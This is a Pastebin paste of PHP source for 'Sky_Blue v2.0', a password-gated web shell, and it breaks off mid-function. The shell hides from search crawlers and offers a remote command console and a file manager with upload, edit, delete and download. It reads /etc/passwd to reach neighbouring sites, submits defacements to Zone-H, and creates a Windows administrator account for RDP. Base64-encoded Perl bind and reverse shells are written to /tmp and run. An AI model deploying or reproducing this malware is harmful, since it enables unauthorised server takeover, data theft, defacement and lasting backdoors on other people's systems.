Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- error_reporting(0);
- set_time_limit(0);
- $auth_pass = "84a94fccf4991338cdb878173be7a245"; // default: ./Infinity21
- $color = "#00ff00";
- $default_action = 'FilesMan';
- $default_use_ajax = true;
- $default_charset = 'UTF-8';
- if(!empty($_SERVER['HTTP_USER_AGENT'])) {
- $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
- if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- }
- function login_shell() {
- ?>
- <html>
- <head>
- <link href='https://s26.postimg.org/yv1hggwhl/Shade.png' rel='SHORTCUT ICON'/>
- <title>2Shell Mr.Uw4X </title>
- <style type="text/css">
- html {
- margin: 20px auto;
- background: #000000;
- color: blue;
- text-align: center;
- }
- header {
- color: blue;
- margin: 10px auto;
- }
- input[type=password] {
- width: 250px;
- height: 25px;
- color: white;
- background: #000000;
- border: 1px solid blue;
- padding: 5px;
- margin-left: 20px;
- text-align: center;
- }
- .blink {
- -webkit-animation-name: blinker;
- -webkit-animation-duration: 3s;
- -webkit-animation-timing-function: linear;
- -webkit-animation-iteration-count: infinite;
- -moz-animation-name: blinker;
- -moz-animation-duration: 2s;
- -moz-animation-timing-function: linear;
- -moz-animation-iteration-count: infinite;
- animation-name: blinker;
- animation-duration: 1s;
- animation-timing-function: linear;
- animation-iteration-count: infinite;
- }
- @-moz-keyframes blinker {
- 0% { opacity: 1.0; }
- 50% { opacity: 0.0; }
- 100% { opacity: 1.0; }
- }
- @-webkit-keyframes blinker {
- 0% { opacity: 1.0; }
- 50% { opacity: 0.0; }
- 100% { opacity: 1.0; }
- }
- @keyframes blinker {
- 0% { opacity: 1.0; }
- 50% { opacity: 0.0; }
- 100% { opacity: 1.0; }
- }
- </style>
- </head>
- <center>
- <header>
- <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
- <font style="color:#000;text-shadow:0px 5px 8px #191970;font-size:90px" face="Orbitron" class="blink">Sky_Blue v2.0</font><br>
- <img src="https://s26.postimg.org/yv1hggwhl/Shade.png" width=24% height=60%>
- <form method="post">
- <input type="password" name="pass">
- </form>
- <?php
- exit;
- }
- if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
- if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- login_shell();
- if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
- @ob_clean();
- $file = $_GET['file'];
- header('Content-Description: File Transfer');
- header('Content-Type: application/octet-stream');
- header('Content-Disposition: attachment; filename="'.basename($file).'"');
- header('Expires: 0');
- header('Cache-Control: must-revalidate');
- header('Pragma: public');
- header('Content-Length: ' . filesize($file));
- readfile($file);
- exit;
- }
- //password until here
- ?>
- <?php
- if(get_magic_quotes_gpc()){
- foreach($_POST as $key=>$value){
- $_POST[$key] = stripslashes($value);
- }
- }
- echo '<!DOCTYPE HTML>
- <html>
- <head>
- <link href="https://s26.postimg.org/yv1hggwhl/Shade.png" rel="HORTCUT ICON">
- <link href="" rel="stylesheet" type="text/css">
- <title>Sky_Blue v2.0</title>
- <style>
- @import url(https://fonts.googleapis.com/css?family=Ubuntu);
- @import url(http://fonts.googleapis.com/css?family=Orbitron:700);
- body{
- font-family: "Ubuntu";
- font-size: 13px;
- background-color: black;
- color:white;
- }
- #content tr:hover{
- background-color: #000;
- color: #191970;
- text-shadow:4px 4px 10px #0000ff;
- }
- #content .first{
- background-color: #191970;
- font-family: "Orbitron";
- font-size: 15px;
- }
- table{
- border: 0px #000000 solid;
- }
- a{
- color:white;
- text-decoration: none;
- }
- a:hover{
- color:blue;
- text-shadow:0px 0px 10px #000070;
- }
- input{
- background: #000;
- color: #fff;
- -moz-border-radius: 5px;
- border-radius:5px;}
- select,textarea{
- border: 1px #191970 solid;
- background: #000000;
- color: #fff;
- -moz-border-radius: 5px;
- -webkit-border-radius:5px;
- border-radius:5px;
- }
- </style>
- </head>
- <body>
- <link href="http://fonts.googleapis.com/css?family=Wallpoet" rel="stylesheet" type="text/css">
- <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">';
- echo '<tr>';
- //Starting About victim
- $kernel = php_uname();
- $ip = gethostbyname($_SERVER['HTTP_HOST']);
- /*fuction hdd*/
- if(!function_exists('posix_getegid')) {
- $user = @get_current_user();
- $uid = @getmyuid();
- $gid = @getmygid();
- $group = "?";
- } else {
- $uid = @posix_getpwuid(posix_geteuid());
- $gid = @posix_getgrgid(posix_getegid());
- $user = $uid['name'];
- $uid = $uid['uid'];
- $group = $gid['name'];
- $gid = $gid['gid'];
- }
- $freespace = hdd(disk_free_space("/"));
- /*Code hdd*/
- $total = hdd(disk_total_space("/"));
- $used = $total - $freespace;
- $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
- $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
- $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
- $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
- $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
- /*code wget python perl*/
- $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
- $ds = @ini_get("disable_functions");
- $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
- if(!function_exists('posix_getegid')) {
- $user = @get_current_user();
- $uid = @getmyuid();
- $gid = @getmygid();
- $group = "?";
- } else {
- $uid = @posix_getpwuid(posix_geteuid());
- $gid = @posix_getgrgid(posix_getegid());
- $user = $uid['name'];
- $uid = $uid['uid'];
- $group = $gid['name'];
- $gid = $gid['gid'];
- }
- //eksekusi
- echo "Name of Shell: <font style='color:#00f;text-shadow:5px 5px 12px #191970;font-size:15px' face='Wallpoet'>Sky_Blue v2.0</font><br>";
- echo "System: <font color=blue>".$kernel."</font><br>";
- echo "Safe Mode: $sm<br>";
- echo "Disable Functions: $show_ds<br>";
- echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
- echo "Group: <font color=blue>".$group."</font> (".$gid.") User: <font color=blue>".$user."</font> (".$uid.") <br>";
- echo "HardDisk: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
- echo "MySQL: $mysql | Curl: $curl | Perl: $perl | Python: $python | WGET: $wget ";
- //ending about victim
- //Code Menu
- if(isset($_GET['path'])){
- $path = $_GET['path'];
- }else{
- $path = getcwd();
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- //starting home bar
- echo "<ul><hr width=58% color=blue><center><font style='color:#00f;text-shadow:5px 5px 12px #191970;font-size:15px' face='Wallpoet'>";
- echo "[ <a href='?'>Home</a> ] [ <a href='?dir=$path&do=cmd'>Console</a> ] [ <a href='?dir=$path&do=jumping'>Jumping</a> ] [ <a href='?dir=$path&do=krdp_shell'>K-RDP Shell</a> ] [ <a href='?dir=$path&do=zoneh'>Zone-H</a> ] [ <a href='?dir=$path&do=network'>Network</a> ] [ <a style='color: Green;' href='?dir=$path&read=readme'>Readme</a> ] [ <a style='color: red;' href='?logout=true'>Logout</a> ]</center>";
- echo "<hr width=58% color=blue><ul></font>";
- //fuction menu bar
- // Readme.md
- if($_GET['read'] == 'readme'){
- echo "<font color=white>";
- echo "<center>############## <font size=3><b><u>Sky_Blue v2.0</u></b></font> #############<br><p> Sky_Blue v2.0 is the 2nd version of Private-Mini Shell<br> In this shell there are changes and additions to the feature.</p><br>Special Thanks To: <p><a href=https://www.indoxploit.or.id/>IndoXploit | </a><a href=http://www.75n1.net/>T.I Sniper | </a><a href=http://www.maxteroit.com/>Owl Squad</a></p></font><p><h3>Leave Me Here <br>Please !! :'( </h3></p></center>";
- }
- // Console
- if($_GET['do'] == 'cmd') {
- echo "<form method='post'>
- <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
- <input type='text' size='30' height='10' name='cmd'> <input type='submit' name='do_cmd' value='GO'>
- </form>";
- if($_POST['do_cmd']) {
- echo "<pre>".exe($_POST['cmd'])."</pre>";
- }
- } elseif($_GET['logout'] == true) {
- unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
- echo "<script>window.location='?';</script>";
- }
- // jumping
- elseif($_GET['do'] == 'jumping') {
- $i = 0;
- echo "<div class='margin: 5px auto;'>";
- if(preg_match("/hsphere/", $path)) {
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $url = str_replace(array("http://","www."), "", strtolower($url));
- $etc = "/etc/passwd";
- $f = fopen($etc,"r");
- while($gets = fgets($f)) {
- $pecah = explode(":", $gets);
- $user = $pecah[0];
- $path_user = "/hsphere/local/home/$user";
- if(is_dir($path_user) === true) {
- $url_user = $path_user."/".$url;
- if(is_readable($url_user)) {
- $i++;
- $jrw = "[<font color=blue>R</font>] <a href='?dir=$url_user'><font color=#191970>$url_user</font></a>";
- if(is_writable($url_user)) {
- $jrw = "[<font color=blue>RW</font>] <a href='?dir=$url_user'><font color=#191970>$url_user</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" style="width: 500px; height: 250px;">';
- $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
- while($getss = fgets($fp)) {
- echo $getss;
- }
- echo '</textarea><br>
- <input type="submit" value="jumping" name="jump" style="width: 500px; height: 25px;">
- </form></center>';
- }
- } elseif(preg_match("/vhosts|vhost/", $path)) {
- preg_match("/\/var\/www\/(.*?)\//", $path, $vh);
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $url = str_replace("www.", "", $url);
- $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
- if(is_dir($web_vh) === true) {
- if(is_readable($web_vh)) {
- $i++;
- $jrw = "[<font color=blue>R</font>] <a href='?dir=$web_vh'><font color=#191970>$web_vh</font></a>";
- if(is_writable($web_vh)) {
- $jrw = "[<font color=blue>RW</font>] <a href='?dir=$web_vh'><font color=#191970>$web_vh</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" style="width: 500px; height: 250px;">';
- bing("ip:$ip");
- echo '</textarea><br>
- <input type="submit" value="jumping" name="jump" style="width: 500px; height: 25px;">
- </form></center>';
- }
- } else {
- echo "<pre>";
- $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
- while($passwd = fgets($etc)) {
- if($passwd == '' || !$etc) {
- echo "<font color=red>Can't read /etc/passwd</font>";
- } else {
- preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
- foreach($user_jumping[1] as $user_idx_jump) {
- $user_jumping_dir = "/home/$user_idx_jump/public_html";
- if(is_readable($user_jumping_dir)) {
- $i++;
- $jrw = "[<font color=blue>R</font>] <a href='?dir=$user_jumping_dir'><font color=#191970>$user_jumping_dir</font></a>";
- if(is_writable($user_jumping_dir)) {
- $jrw = "[<font color=blue>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#191970>$user_jumping_dir</font></a>";
- }
- echo $jrw;
- if(function_exists('posix_getpwuid')) {
- $domain_jump = file_get_contents("/etc/named.conf");
- if($domain_jump == '') {
- echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
- } else {
- preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
- foreach($domains_jump[1] as $dj) {
- $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
- $user_jumping_url = $user_jumping_url['name'];
- if($user_jumping_url == $user_idx_jump) {
- echo " => ( <u>$dj</u> )<br>";
- break;
- }
- }
- }
- } else {
- echo "<br>";
- }
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- }
- echo "</div>";
- }
- // Zone-H
- elseif($_GET['do'] == 'zoneh') {
- if($_POST['submit']) {
- $domain = explode("\r\n", $_POST['url']);
- $nick = $_POST['nick'];
- echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
- echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
- function zoneh($url,$nick) {
- $ch = curl_init("http://www.zone-h.com/notify/single");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
- return curl_exec($ch);
- curl_close($ch);
- }
- foreach($domain as $url) {
- $zoneh = zoneh($url,$nick);
- if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
- echo "$url -> <font color=blue>OK</font><br>";
- } else {
- echo "$url -> <font color=red>ERROR</font><br>";
- }
- }
- } else {
- echo "<center><form method='post'>
- Attacker: <br><br>
- <input type='text' name='nick' size='25' value='Mr.Uw4X'><br><br>
- Domains: <br>
- <textarea style='width: 450px; height: 80px;' name='url'></textarea><br><br>
- <input type='submit' name='submit' value='Archive' style='width: 150px;'>
- </form>";
- }
- echo "</center>";
- }
- // K-rdp shell
- elseif($_GET['do'] == 'krdp_shell') {
- if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
- if($_POST['create']) {
- $user = htmlspecialchars($_POST['user']);
- $pass = htmlspecialchars($_POST['pass']);
- if(preg_match("/$user/", exe("net user"))) {
- echo "[INFO] -> <font color=red>user <font color=blue>$user</font> sudah ada</font>";
- } else {
- $add_user = exe("net user $user $pass /add");
- $add_groups1 = exe("net localgroup Administrators $user /add");
- $add_groups2 = exe("net localgroup Administrator $user /add");
- $add_groups3 = exe("net localgroup Administrateur $user /add");
- echo "[ RDP ACCOUNT INFO ]<br>
- ------------------------------<br>
- IP: <font color=blue>".$ip."</font><br>
- Username: <font color=blue>$user</font><br>
- Password: <font color=blue>$pass</font><br>
- ------------------------------<br><br>
- [ STATUS ]<br>
- ------------------------------<br>
- ";
- if($add_user) {
- echo "[add user] -> <font color='blue'>Succesfully</font><br>";
- } else {
- echo "[add user] -> <font color='red'>Failed</font><br>";
- }
- if($add_groups1) {
- echo "[add localgroup Administrators] -> <font color='blue'>Succesfully</font><br>";
- } elseif($add_groups2) {
- echo "[add localgroup Administrator] -> <font color='blue'>Succesfully</font><br>";
- } elseif($add_groups3) {
- echo "[add localgroup Administrateur] -> <font color='blue'>Succesfully</font><br>";
- } else {
- echo "[add localgroup] -> <font color='red'>Failed</font><br>";
- }
- echo "------------------------------<br>";
- }
- } elseif($_POST['s_opsi']) {
- $user = htmlspecialchars($_POST['r_user']);
- if($_POST['opsi'] == '1') {
- $cek = exe("net user $user");
- echo "Checking username <font color=blue>$user</font> ....... ";
- if(preg_match("/$user/", $cek)) {
- echo "[ <font color=blue>Already Exist</font> ]<br>
- ------------------------------<br><br>
- <pre>$cek</pre>";
- } else {
- echo "[ <font color=red>Not Exist</font> ]";
- }
- } elseif($_POST['opsi'] == '2') {
- $cek = exe("net user $user uwax");
- if(preg_match("/$user/", exe("net user"))) {
- echo "[change password: <font color=blue>uwax</font>] -> ";
- if($cek) {
- echo "<font color=blue>Succesfully</font>";
- } else {
- echo "<font color=red>Failed</font>";
- }
- } else {
- echo "[INFO] -> <font color=red>user <font color=blue>$user</font> Not Exist</font>";
- }
- } elseif($_POST['opsi'] == '3') {
- $cek = exe("net user $user /DELETE");
- if(preg_match("/$user/", exe("net user"))) {
- echo "[remove user: <font color=blue>$user</font>] -> ";
- if($cek) {
- echo "<font color=blue>Succesfully</font>";
- } else {
- echo "<font color=red>Failed</font>";
- }
- } else {
- echo "[INFO] -> <font color=red>user <font color=blue>$user</font> belum ada</font>";
- }
- } else {
- //
- }
- } else {
- echo "-- Create RDP --<br>
- <form method='post'>
- <input type='text' name='user' placeholder='username' value='uwax' required>
- <input type='text' name='pass' placeholder='password' value='uwax' required>
- <input type='submit' name='create' value='>>'>
- </form>
- -- Option --<br>
- <form method='post'>
- <input type='text' name='r_user' placeholder='username' required>
- <select name='opsi'>
- <option value='1'>Cek Username</option>
- <option value='2'>Ubah Password</option>
- <option value='3'>Hapus Username</option>
- </select>
- <input type='submit' name='s_opsi' value='>>'>
- </form>
- ";
- }
- } else {
- echo "<font color=red><center>This feature just work in windows server . !!</center></font>";
- }
- }
- // Network
- elseif($_GET['do'] == 'network') {
- echo "<center><form method='post'>
- Bind Port: <br><br>
- Port: <input type='text' placeholder='port' name='port_bind' value='4455'>
- <input type='submit' name='sub_bp' value='GO'>
- </form><br><br>
- <form method='post'>
- Reverse Connection: <br><br>
- Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
- Port: <input type='text' placeholder='port' name='port_bc' value='4455'>
- <input type='submit' name='sub_bc' value='GO'>
- </form><br></center>";
- $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
- if(isset($_POST['sub_bp'])) {
- $f_bp = fopen("/tmp/bp.pl", "w");
- fwrite($f_bp, base64_decode($bind_port_p));
- fclose($f_bp);
- $port = $_POST['port_bind'];
- $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
- sleep(1);
- echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
- unlink("/tmp/bp.pl");
- }
- $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
- if(isset($_POST['sub_bc'])) {
- $f_bc = fopen("/tmp/bc.pl", "w");
- fwrite($f_bc, base64_decode($bind_connect_p));
- fclose($f_bc);
- $ipbc = $_POST['ip_bc'];
- $port = $_POST['port_bc'];
- $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
- sleep(1);
- echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
- unlink("/tmp/bc.pl");
- }
- }
- //ending home bar
- echo '</tr>';
- echo '<tr><td><font color="blue">Current Dir :</font> ';
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?path=/">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a href="?path=';
- for($i=0;$i<=$id;$i++){
- echo "$paths[$i]";
- if($i != $id) echo "/";
- }
- echo '">'.$pat.'</a>/';
- }
- echo '</td></tr><tr><td><center>';
- if(isset($_FILES['file'])){
- if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
- echo '<center><font color="blue">Upload Success</font><br /></center>';
- }else{
- echo '<center><font color="red">Upload Failed</font><br/></center>';
- }
- }
- echo '<form enctype="multipart/form-data" method="POST">
- <font color="white">File Upload :</font> <input type="file" name="file" />
- <input type="submit" value="upload" />
- </form>
- </center></td></tr>';
- if(isset($_GET['filesrc'])){
- echo "<tr><td>Current File : ";
- echo $_GET['filesrc'];
- echo '</tr></td></table><br />';
- echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(chmod($_POST['path'],$_POST['perm'])){
- echo '<font color="blue">Set Permission Success</font><br/>';
- }else{
- echo '<font color="red">Set Permission Failed</font><br />';
- }
- }
- echo '<form method="POST">
- Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo '<font color="blue">Ganti Nama Success</font><br/>';
- }else{
- echo '<font color="red">Ganti Nama Failed</font><br />';
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo '<form method="POST">
- New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- } elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['src'])){
- $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){
- echo '<font color="blue">Success Edit File</font><br/>';
- }else{
- echo '<font color="red">Failed Edit File</font><br/>';
- }
- fclose($fp);
- }
- echo '<form method="POST">
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input type="submit" value="Save" />
- </form>';
- }
- echo '</center>';
- }else{
- echo '</table><br/><center>';
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
- if($_POST['type'] == 'dir'){
- if(rmdir($_POST['path'])){
- echo '<font color="blue">Directory Delete</font><br/>';
- }else{
- echo '<font color="red">Directory Failed Deleted </font><br/>';
- }
- }elseif($_POST['type'] == 'file'){
- if(unlink($_POST['path'])){
- echo '<font color="blue">File Terhapus</font><br/>';
- }else{
- echo '<font color="red">File Failed Dihapus</font><br/>';
- }
- }
- }
- echo '</center>';
- echo '<div id="content"><table width="1250" cellpadding="2" cellspacing="1" align="center">
- <tr class="first">
- <td><center>Name</center></td>
- <td><center>Type</center></td>
- <td><center>Last Modify</center></td>
- <td><center>Owner/Group</center></td>
- <td><center>Size</center></td>
- <td><center>Permission</center></td>
- <td><center>Action</center></td>
- <td><center>Backup</center></td>
- </tr>';
- //For Code Column Directory
- $scandir = scandir($path);
- foreach($scandir as $dirx){
- $dtype = filetype("$path/$dirx");
- $dtime = date("F d Y g:i:s", filemtime("$path/$dirx"));
- if(function_exists('posix_getpwuid')) {
- $downer = @posix_getpwuid(fileowner("$path/$dirx"));
- $downer = $downer['name'];
- } else {
- //$downer = $uid;
- $downer = fileowner("$path/$dirx");
- }
- if(function_exists('posix_getgrgid')) {
- $dgrp = @posix_getgrgid(filegroup("$path/$dirx"));
- $dgrp = $dgrp['name'];
- } else {
- $dgrp = filegroup("$path/$dirx");
- }
- if(!is_dir($path.'/'.$dirx) || $dirx == '.' || $dirx== '..') continue;
- echo '<tr>
- <td><a href="?path='.$path.'/'.$dirx.'">'.$dirx.'</a></td>';
- echo "<td><center>$dtype</center></td>";
- echo "<td><center>$dtime</center></td>";
- echo "<td><center>$downer/$dgrp</center></td>";
- echo "<td><center>--</center></td>
- <td><center>";
- if(is_writable($path.'/'.$dirx)) echo '<font color="blue">';
- elseif(!is_readable($path.'/'.$dirx)) echo '<font color="red">';
- echo perms($path.'/'.$dirx);
- if(is_writable($path.'/'.$dirx) || !is_readable($path.'/'.$dirx)) echo '</font>';
- echo '</center></td>
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- </select>
- <input type="hidden" name="type" value="dir">
- <input type="hidden" name="name" value="'.$dirx.'">
- <input type="hidden" name="path" value="'.$path.'/'.$dirx.'">
- <input type="submit" value="GO">
- </form></center></td>
- <td><center>--</center></td>
- </tr>';
- }
- //Code For File Column
- foreach($scandir as $file){
- $ftype = filetype("$path/$file");
- $ftime = date("F d Y g:i:s", filemtime("$path/$file"));
- if(function_exists('posix_getpwuid')) {
- $fowner = @posix_getpwuid(fileowner("$path/$file"));
- $fowner = $fowner['name'];
- } else {
- //$downer = $uid;
- $fowner = fileowner("$path/$file");
- }
- if(function_exists('posix_getgrgid')) {
- $fgrp = @posix_getgrgid(filegroup("$path/$file"));
- $fgrp = $fgrp['name'];
- } else {
- $fgrp = filegroup("$path/$file");
- }
- if(!is_file($path.'/'.$file)) continue;
- $size = filesize($path.'/'.$file)/1024;
- $size = round($size,3);
- if($size >= 1024){
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }
- echo '<tr>
- <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>';
- echo "<td><center>$ftype</center></td>";
- echo "<td><center>$ftime</center></td>";
- echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
- echo "<td><center>$size</center></td>
- <td><center>";
- if(is_writable($path.'/'.$file)) echo '<font color="blue">';
- elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
- echo perms($path.'/'.$file);
- if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
- echo '</center></td>
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- <option value="edit">Edit</option>
- </select>
- <input type="hidden" name="type" value="file">
- <input type="hidden" name="name" value="'.$file.'">
- <input type="hidden" name="path" value="'.$path.'/'.$file.'">
- <input type="submit" value="GO">
- </form></center></td>';
- echo "<td><center><a href='?act=download&dir=$path&file=$path/$file'>Save</a></center></td></td>
- </tr>";
- }
- echo '</table>
- </div>';
- }
- echo "<center><hr width=280 color=#191970>Copyright © ".date("Y")." - <a href='https://www.kali.org/'><font color=blue>Mr.Uw4X</font></a></center>
- </body>
- </html>";
- //Function Code HDD + exe
- function hdd($s) {
- if($s >= 1073741824)
- return sprintf('%1.2f',$s / 1073741824 ).' GB';
- elseif($s >= 1048576)
- return sprintf('%1.2f',$s / 1048576 ) .' MB';
- elseif($s >= 1024)
- return sprintf('%1.2f',$s / 1024 ) .' KB';
- else
- return $s .' B';
- }
- function exe($cmd) {
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result) {
- $buff .= $result;
- } return $buff;
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('shell_exec')) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
